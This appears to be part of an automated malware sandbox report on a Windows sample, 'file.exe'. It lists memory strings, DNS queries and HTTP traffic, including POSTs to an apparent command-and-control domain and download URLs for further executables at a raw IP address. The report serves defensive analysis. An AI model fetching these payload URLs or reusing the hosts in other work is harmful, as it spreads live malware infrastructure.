        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: </section>`}function Dce(e=tw,t=gp){return sl(M4,e,t)}function $ce(e=aw,t=sw){return sl(t4,e,t)}var vI=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(vI||{}),LRe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function $x(e,t,o){let n=encodeURIComponent(t),r=new URL(e);r.hostname="learn.microsoft.com";let s=r.href+=(e.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=L.sharingId?`&sharingId=${L.sharingId}`:"";return Object.values(vI).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let d=encodeURIComponent(s+c+i),u=o?.achievementCopyTitle?.overrideTitle??t,p=encodeURIComponent(rQ.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${u}`:`"${u}"`)),g={achievementCopy:p,url:d,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)
        Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: js.monitor.azure.com
        Source: global trafficDNS traffic detected: DNS query: mdec.nelreports.net
        Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
        Source: file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
        Source: file.exe, 00000000.00000002.2464188669.0000000000FCA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exepleWebKit/537.36
        Source: file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: http://polymer.github.io/AUTHORS.txt
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: http://polymer.github.io/LICENSE.txt
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: http://polymer.github.io/PATENTS.txt
        Source: chromecache_130.5.drString found in binary or memory: http://schema.org/Organization
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
        Source: file.exe, 00000000.00000003.2150442677.0000000005CFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnl
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://aka.ms/certhelp
        Source: chromecache_130.5.dr, chromecache_131.5.drString found in binary or memory: https://aka.ms/feedback/report?space=61
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://aka.ms/msignite_docs_banner
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://aka.ms/pshelpmechoose
        Source: chromecache_130.5.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
        Source: chromecache_130.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
        Source: chromecache_130.5.drString found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
        Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
        Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://channel9.msdn.com/
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
        Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
        Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/Thraka
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/Youssef1313
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/adegeo
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://github.com/dotnet/try
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/gewarren
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://github.com/js-cookie/js-cookie
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/mairaw
        Source: chromecache_130.5.drString found in binary or memory: https://github.com/nschonni
        Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
        Source: chromecache_130.5.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
        Source: file.exe, file.exe, 00000000.00000003.2202757971.0000000001311000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2358730980.00000000012FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
        Source: file.exe, 00000000.00000003.2221296992.0000000005CBA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
        Source: file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api9-
        Source: file.exe, 00000000.00000002.2464239287.0000000001291000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiicrosoft
        Source: chromecache_122.5.drString found in binary or memory: https://schema.org
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
        Source: chromecache_122.5.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
        Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
        Source: file.exe, 00000000.00000003.2175065924.0000000001325000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: file.exe, 00000000.00000003.2103747542.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103827557.0000000005C76000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103547875.0000000005C79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: chromecache_110.5.dr, chromecache_122.5.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
        Source: file.exe, 00000000.00000003.2151552451.0000000005F66000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49722 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.5:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49811 version: TLS 1.2

        System Summary

        barindex
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: .idata
        Source: file.exeStatic PE information: section name:
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01304F130_3_01304F13
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012CB14E0_3_012CB14E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012CB14E0_3_012CB14E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012CB14E0_3_012CB14E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_012CB14E0_3_012CB14E
        Source: file.exe, 00000000.00000003.2308561038.0000000006191000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2309608592.000000000625B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2323053442.00000000060EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305571118.0000000005D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2316904470.00000000061F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000002.2464239287.000000000131C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2357972834.0000000005CC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2309874403.00000000061A6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2322237027.00000000060E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2361600016.0000000005CD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305754805.0000000005E3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000002.2468321345.00000000060E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2311629582.00000000061BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2310326260.00000000060E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2358730980.000000000131C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2356695905.0000000005CD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2356695905.0000000005CD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
        Source: file.exe, 00000000.00000003.2310676700.00000000060E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305917129.0000000005E49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306313214.0000000005D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2321254754.000000000622B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2304270252.0000000005E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2310547955.00000000061AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307305929.000000000617A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2318786320.00000000060E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306683546.0000000005F4B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307891269.000000000622F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2316478668.00000000060EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2319810551.0000000006341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2314928754.00000000061DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
